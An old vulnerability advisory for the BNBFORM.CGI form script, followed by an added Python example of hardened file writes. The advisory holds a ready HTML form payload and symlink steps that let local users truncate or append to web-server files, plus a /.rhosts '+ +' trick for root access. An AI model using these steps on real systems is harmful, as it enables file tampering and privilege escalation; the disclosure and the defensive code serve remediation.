suid@suid.kg - mini advisory - BNBFORM.CGI

Software:   BNBFORM.CGI
Vendor:     BigNoseBird.com
URL:        http://bignosebird.com/carchive/bnbform.shtml
Version:    Version 4.0
Platforms:  Unix, Windows NT
Type:       Input validation problem

Summary:

Any local user can create / append to / truncate any file owned by the web server user (nobody/apache/whatever).

Vulnerability:

Build an HTML form resembling:

    <form method=post action=/cgi-bin/bnbform.cgi>
    <input type=hidden name=blah value=blah>
    <input type=hidden name=required value=blah>
    <input type=hidden name=data_order value=blah>
    <!-- To truncate a file -->
    <input type=hidden name=countfile value="/tmp/whatever">
    <!-- To append to a file -->
    <input type=hidden name=outputfile value="/tmp/whatever">
    <input type=submit>
    </form>

In the /tmp directory, as a local user, create a symbolic link named either /tmp/whatever.bcnt (for the countfile/truncate version) or /tmp/whatever.bout (for the outputfile/append version). The script takes the path from the form field unchecked, appends the .bcnt or .bout suffix and opens it, so the link decides which file it actually writes.

If httpd is running with UID == 0, you could potentially get root if the system honours /.rhosts, by setting the value of blah to "+ +\n" and then symlinking /tmp/whatever.bout -> /.rhosts.

Example:

    <input type=hidden name=blah value="+ +
    ">

Of course you could simply send this in a POST request directly to the web server. Whatever.

Ok. Have a good one.

http://www.suid.edu/advisories/004.txt
EOF
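The defect is that countfile/outputfile are taken as arbitrary paths and opened with the symlink followed. The following is an added example, not the vendor's code, showing how a CGI should handle such a field: accept only a bare name, pin it under a fixed data directory (DATA_DIR here is a hypothetical temp directory), and open with O_NOFOLLOW so a planted link makes the open fail instead of redirecting the write.

```python
import os
import re
import stat
import tempfile

# Hypothetical fixed data directory; the script must never take a directory from the form.
DATA_DIR = tempfile.mkdtemp(prefix="bnbform-demo-")

# Accept only a bare file name: "/tmp/whatever" and "../../etc/passwd" both fail this.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def write_record(user_value, suffix, append, data):
    """Write data to DATA_DIR/<user_value><suffix>, refusing symlinks and anything
    outside DATA_DIR. Returns True on success, False if the request was rejected."""
    if not SAFE_NAME.fullmatch(user_value):
        return False
    path = os.path.join(DATA_DIR, user_value + suffix)
    flags = os.O_WRONLY | os.O_CREAT | (os.O_APPEND if append else os.O_TRUNC)
    # O_NOFOLLOW makes the open fail (ELOOP) when the final component is a symlink,
    # which is exactly what a local user plants in a shared directory like /tmp.
    flags |= getattr(os, "O_NOFOLLOW", 0)
    try:
        fd = os.open(path, flags, 0o600)
    except OSError:
        return False
    try:
        # Belt and braces: confirm the descriptor is a regular file, not a FIFO or device.
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            return False
        os.write(fd, data.encode())
    finally:
        os.close(fd)
    return True


def read_record(user_value, suffix):
    """Read a record back; None if the name is rejected or the file is missing."""
    if not SAFE_NAME.fullmatch(user_value):
        return None
    try:
        with open(os.path.join(DATA_DIR, user_value + suffix)) as fh:
            return fh.read()
    except OSError:
        return None


def plant_symlink_for_test(user_value, suffix, target_name):
    """Test helper: simulate the link a local user would leave in the data directory."""
    os.symlink(target_name, os.path.join(DATA_DIR, user_value + suffix))
```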